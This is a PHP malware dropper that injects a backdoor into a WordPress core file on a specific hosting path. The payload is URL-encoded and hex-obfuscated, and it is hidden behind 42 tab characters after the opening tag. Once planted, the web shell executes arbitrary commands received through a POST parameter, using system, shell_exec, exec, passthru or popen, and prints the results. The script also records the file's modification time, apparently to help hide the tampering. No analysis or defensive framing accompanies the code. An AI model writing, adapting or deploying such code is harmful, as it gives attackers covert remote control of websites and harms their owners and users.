<?php  $path = '/home1/tabela11/public_html/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24element1%20%3D%20%27973%27%3B%24element2%20%3D%20%27736%27%3B%24element3%20%3D%20%27865%27%3B%24element4%20%3D%20%276c6%27%3B%24element5%20%3D%20%27706%27%3B%24element6%20%3D%20%27173%27%3B%24element7%20%3D%20%27727%27%3B%24element8%20%3D%20%27737%27%3B%24element9%20%3D%20%27472%27%3B%24element10%20%3D%20%27656%27%3B%24element11%20%3D%20%2716d%27%3B%24element12%20%3D%20%275f6%27%3B%24element13%20%3D%20%27765%27%3B%24element14%20%3D%20%276f6%27%3B%24element15%20%3D%20%27e74%27%3B%24element16%20%3D%20%2736c%27%3B%24element17%20%3D%20%276f7%27%3B%24element18%20%3D%20%27365%27%3B%24element19%20%3D%20%27636%27%3B%24element20%20%3D%20%27f72%27%3B%24element21%20%3D%20%276e6%27%3B%24element22%20%3D%20%27769%27%3B%24buffer_cache1%20%3D%20pack%28%22H%2A%22%2C%20%27737%27%20.%20%24element1%20.%20%27746%27%20.%20%2756d%27%29%3B%24buffer_cache2%20%3D%20pack%28%22H%2A%22%2C%20%24element2%20.%20%24element3%20.%20%24element4%20.%20%27c5f%27%20.%20%27657%27%20.%20%24element3%29%3B%24buffer_cache3%20%3D%20pack%28%22H%2A%22%2C%20%27657%27%20.%20%24element3%29%3B%24buffer_cache4%20%3D%20pack%28%22H%2A%22%2C%20%24element5%20.%20%24element6%20.%20%27737%27%20.%20%27468%27%20.%20%24element7%29%3B%24buffer_cache5%20%3D%20pack%28%22H%2A%22%2C%20%27706%27%20.%20%27f70%27%20.%20%27656%27%29%3B%24buffer_cache6%20%3D%20pack%28%22H%2A%22%2C%20%24element8%20.%20%24element9%20.%20%24element10%20.%20%24element11%20.%20%24element12%20.%20%24element13%20.%20%27745%27%20.%20%27f63%27%20.%20%24element14%20.%20%24element15%20.%20%27656%27%20.%20%24element15%29%3B%24buffer_cache7%20%3D%20pack%28%22H%2A%22%2C%20%24element5%20.%20%24element16%20.%20%24element17%20.%20%24element18%29%3B%24core_engine%20%3D%20pack%28%22H%2A%22%2C%20%24element19%20.%20%24element20%20.%20%27655%27%20.%20%27f65%27%20.%20%24element21%20.%20%24element22%20.%20%24element21%29%3Bif%28isset%28%24_POST%5B%24core_engine%5D%29%29%7B%24core_engine%3Dpack%28%22H%2A%22%2C%24_POST%5B%24core_engine%5D%29%3Bif%28function_exists%28%24buffer_cache1%29%29%7B%24buffer_cache1%28%24core_engine%29%3B%7Delseif%28function_exists%28%24buffer_cache2%29%29%7Bprint%20%24buffer_cache2%28%24core_engine%29%3B%7Delseif%28function_exists%28%24buffer_cache3%29%29%7B%24buffer_cache3%28%24core_engine%2C%24holder_binding%29%3Bprint%20join%28%22%5Cn%22%2C%24holder_binding%29%3B%7Delseif%28function_exists%28%24buffer_cache4%29%29%7B%24buffer_cache4%28%24core_engine%29%3B%7Delseif%28function_exists%28%24buffer_cache5%29%26%26function_exists%28%24buffer_cache6%29%26%26function_exists%28%24buffer_cache7%29%29%7B%24tkn_val%3D%24buffer_cache5%28%24core_engine%2C%22r%22%29%3Bif%28%24tkn_val%29%7B%24pointer_itm%3D%24buffer_cache6%28%24tkn_val%29%3B%24buffer_cache7%28%24tkn_val%29%3Bprint%20%24pointer_itm%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');